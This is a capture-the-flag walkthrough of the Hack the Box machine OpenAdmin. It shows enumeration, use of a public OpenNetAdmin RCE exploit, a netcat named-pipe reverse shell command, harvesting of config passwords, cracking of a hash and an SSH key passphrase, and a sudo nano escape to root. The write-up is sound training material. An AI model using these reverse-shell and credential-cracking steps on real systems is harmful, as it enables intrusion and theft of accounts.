Hack the Box - OpenAdmin

OpenAdmin was one of my favorite boxes. It's actually not very difficult, but it has just enough to force you to look around a bit. I enjoyed it because I felt like nothing was really guesswork. Everything I needed was presented to me on the box and in some way that seemed at least somewhat realistic. At the very least, there were just enough breadcrumbs to point you in a direction where you didn't feel it relied partly on guesswork, and that's always a plus for me.

Nmap Scans

First, we start with Nmap, as always:

sudo nmap -T4 -p 22,80 -sSV -sC -oN scriptScan
[sudo] password for nux: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 20:23 CDT 
Nmap scan report for      
Host is up (0.24s latency).         
PORT   STATE SERVICE VERSION                              
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

Looks like we only have SSH and HTTP. SSH is rarely a great avenue of attack in HTB. You'll just learn that as you do more boxes. It's pretty secure overall, and when it comes to HTB, the way in is usually designed around the box: credential reuse (so you would see some hint as to the password), default password (so you might see a machine running Raspbian or another known service and use a known default there), etc. In other words, SSH is rarely where we get our initial foothold unless the box hints otherwise by providing us with some way in.

Port 80 – HTTP

We investigate HTTP. Looks like a default Apache page. We can try some common directories like robots.txt. Not much to see here:


We can start investigating the services we found and will see that we have a web server. Let's take a look at some of those directories. There's the Apache default page, but as always, we run GoBuster to enumerate web directories.

I'll run the following, which tells gobuster to run directory enumeration on the webserver using the common.txt wordlist and outputting to a file called commonList that I can look at later if I need to.

gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -o commonList

Let's take a look at the output:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/07/11 20:30:35 Starting gobuster
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)
2020/07/11 20:32:00 Finished

While this tool is running, I like to poke around and see if I can find anything. Not a lot turns up on this box.

Investigating the different directories

Now that our directory scan has finished, we can investigate the results. Click around, see if there are any useful links. There's no real secret here other than manually browsing, looking at source, etc. Try to see if there's anything that look interesting.

Eventually we come to music. It looks like some page for something called SOL music.

Interestingly, if we look at the top of the browser window, we will see a bit of a giveaway:

Not live. Not for production use. Interesting. It's still in development. This is probably our hint to keep looking. Eventually, if we click around enough, we hit the "login" link and are taken to: "" I would imagine there may be a wordlist out there with this, but it's nice to see that it's reachable with persistent searching through the webpages.

Interesting things to note here: "Newer version available" and "Your version = v18.1.1."

That gives us two vital pieces of information:

  • The current version of this console (18.1.1).
  • It tells us that this one is out of date.

The directory is called ona, so let's search for ona 18.1.1 and see what we find. Well, that's convenient. The first result in Google is an ExploitDB entry for RCE on OpenNetAdmin 18.1.1. What a coincidence! Our box is called  OpenAdmin. Ya think maybe we can? We'll see.


Let's run the script and .... fail:

$ ./exploit.sh
./exploit.sh: line 8: $'\r': command not found
./exploit.sh: line 16: $'\r': command not found
./exploit.sh: line 18: $'\r': command not found
./exploit.sh: line 23: syntax error near unexpected token `done'
./exploit.sh: line 23: `done'

So much for that win. What the heck does that even mean?

I searched for one of the errors: "$'\r': command not found"

What does this mean? After some searching, we find this link: https://stackoverflow.com/questions/11616835/r-command-not-found-bashrc-bash-profile

Turns out that it's a newline character issue. Maybe it was created on a Windows machine. The solution is to run dos2unix on it:

$ dos2unix exploit.sh 
dos2unix: converting file exploit.sh to Unix format...

That wasn't so bad. Let's try again:

~/Documents/htb/boxes/openadmin/sploits$ ./exploit.sh
$ whoami

Sweet. We have a shell.

Now, we have to upgrade our shell so we can make it somewhat useable. That's easy enough:

First, let's run which python. We get nothing. How about which python3? Good news. Python 3 is installed: /usr/bin/python3.

Attempting to upgrade the shell doesn't seem to work. It just seems to fail. Maybe first we can set up our reverse shell and then upgrade it from there.

Set up our listener and run: `mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc 443 1>/tmp/backpipe`

Okay. We have our shell now.

Terminal 1 where we had our original shell:

$ ./exploit.sh
$ whoami
$ mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc 443 1>/tmp/backpipe

Terminal 2, where we had our listener:

~$ nlis443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 59698

Time to upgrade that shell, boi!!!

Remember, this box has Python 3: /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Hit ctrl+z to put your current netcat session in the background.
  • Type stty raw -echo
  • Type fg and enter to bring your process back into the foreground.
  • export TERM=xterm

Now that's a shell.

Enumeration Time!

Let's look around and see what we find on this sucker.

As we continue to work our way through, we find the following:

www-data@openadmin:/var/www/html$ l
total 36K
-rw-r--r-- 1 www-data www-data  11K Nov 21  2019 index.html
lrwxrwxrwx 1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 marga
drwxrwxr-x 7 www-data www-data 4.0K Nov 22  2019 artwork
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 sierra
drwxr-xr-x 6 www-data www-data 4.0K Nov 22  2019 .
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 music
drwxr-xr-x 4 root     root     4.0K Nov 22  2019 ..

Again, this is just a lot of searching and hoping to find something. I notice that ona is a symlink to /opt/ona/www.

Through searching we find the following directory:

www-data@openadmin:/var/www/html/ona/local/config$ ls
database_settings.inc.php  motd.txt.example  run_installer

With a bit of grep magic, we find a password:

www-data@openadmin:/var/www/html/ona/local/config$ cat * | egrep pass
        'db_passwd' => 'n1nj4W4rri0R!',

Let's hold on to that: n1nj4W4rri0R!

What else can we find?

www-data@openadmin:/var/www/html/ona/local/config$ cd /var/www/
www-data@openadmin:/var/www$ l
total 16K
drwxr-xr-x 14 root     root     4.0K Nov 21  2019 ..
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
drwxr-xr-x  6 www-data www-data 4.0K Nov 22  2019 html
drwxr-xr-x  4 root     root     4.0K Nov 22  2019 .
drwxrwx---  2 jimmy    internal 4.0K Nov 23  2019 internal

There's a file owned by jimmy and it belongs to the internal group. I don't have access. Maybe I can check that later.

Finding users

We can look up users by looking at the /home directory:

www-data@openadmin:/var/www/html/ona/local/config$ ls /home
jimmy  joanna

We can also checkout /etc/passwd:

www-data@openadmin:/var/www/html/ona/local/config$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We know jimmy and joanna are definitely two users. (Sidenote: I'm doing this with knowledge obtained by having solved the box in the past. I intend to create a post where I go over some enumeration steps in more detail, so it can make more sense how I came to this. It wasn't magic. It was hours of frustration and searching through files.)

Attempting to use that password

Let's see if we can ssh into the box with one of those users and that password we got. Sweet! The password works for jimmy:

~$ ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 12 03:34:32 UTC 2020

  System load:  0.05              Processes:             121
  Usage of /:   49.3% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from

Finding running services

We can see some services running on local host. The on running on port 52846 seems a bit unusual. We will soon investigate that:

www-data@openadmin:/var/www/html/ona/local/config$ netstat -natp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      2         ESTABLISHED 2380/nc             
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0       ESTABLISHED -                   
tcp6       1      0       CLOSE_WAIT  -                   
tcp6       0      0       ESTABLISHED -   

Let's see what this service is.

If we hit: shift ~ c, we can set up local SSH port forwarding. This will give us the ability to see what's running on that port that only local host can access:

ssh> -L 31337:
Forwarding port.

Now we can open our browser and navigate to

This will forward our traffic from my localhost's 31337 to localhost of the box I'm SSH'd into and direct that traffic to port 52846. Going to take a sec to drop a link for my friend's book here: CPH, which goes over SSH tunnelz and more.

It's a hidden login page:

Looks like our jimmy creds don't work. We have to find something else.

Back in our SSH session, I remembered that folder owned by jimmy: /var/www/internal.

We see three php files. Let's take a closer look:

jimmy@openadmin:/var/www/internal$ l
index.php*  logout.php*  main.php*

Parsing through these files, we eventually see that main.php has something interesting:

jimmy@openadmin:/var/www/internal$ cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

We also see an interesting file when we try to grep out a password:

jimmy@openadmin:/var/www/internal$ cat * | egrep pass
         .form-signin input[type="password"] {
            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $msg = 'Wrong username or password.';
            <input type = "password" class = "form-control"
               name = "password" required>
<h3>Don't forget your "ninja" password</h3>

Looks like a sha512 hash. Let's take it to CrackStation and see what we get.

CrackStation made short work of that hash: Revealed is the password.

Perhaps it works on that login page we found? We try the following creds: jimmy:Revealed.

This takes us to

And we see a private key:

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D


The bottom of the page reads: Don't forget your "ninja" password. We will keep that in mind.

We can save that key on our local machine.

Looking back at main.php, we can see what it does:

cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

Interesting. It reads joanna's private ssh key. This means it has access to joanna's files. Maybe it runs as joanna.

Let's see if we can use that private key to ssh into the box:

$ ssh joanna@ -i private
load pubkey "private": invalid format
Permissions 0644 for 'private' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "private": bad permissions
joanna@'s password:                              

Whoops. Let's chmod that mofo: chmod 700 private

Woo! Let's go again!

$ ssh joanna@ -i private            
load pubkey "private": invalid format                                                                  
Enter passphrase for key 'private':     

Welp, I don't have a passphrase. Back to the drawing board. Maybe we can crack it.

First, we create a hash of the private key with ssh2john.py:

/usr/share/john/ssh2john.py privateKey > priv.hash
~/Documents/htb/boxes/openadmin/sshkeys$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt priv.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (private)
1g 0:00:00:03 DONE (2020-07-11 23:13) 0.2597g/s 3725Kp/s 3725Kc/s 3725KC/sa6_123..*7¡Vamos!
Session completed

Then we crack it and get a result of: bloodninjas

We have an ssh passphrase. That must be what "Don't forget your "ninja" password" meant.

Let's try again:

~/Documents/htb/boxes/openadmin/sshkeys$ ssh joanna@ -i private
load pubkey "private": invalid format
Enter passphrase for key 'private': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 12 04:17:17 UTC 2020

  System load:  0.24              Processes:             112
  Usage of /:   49.6% of 7.81GB   Users logged in:       1
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from

Sweet. We are in as joanna.

Getting root

It's a good habit to run sudo -l when you first login as a user:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

This output tells us that joanna can run /bin/nano /opt/priv with sudo rights and no password.

Let's give it a shot.

It takes us to nano:

We can attempt a shell escape. A good resource is GTFObins.

Looks like nano can be used to break into a root shell:

It can be used to break out from restricted environments by spawning an interactive system shell.

reset; sh 1>&0 2>&0

Let's attempt

reset; sh 1>&0 2>&0

while running Nano.

And we are root: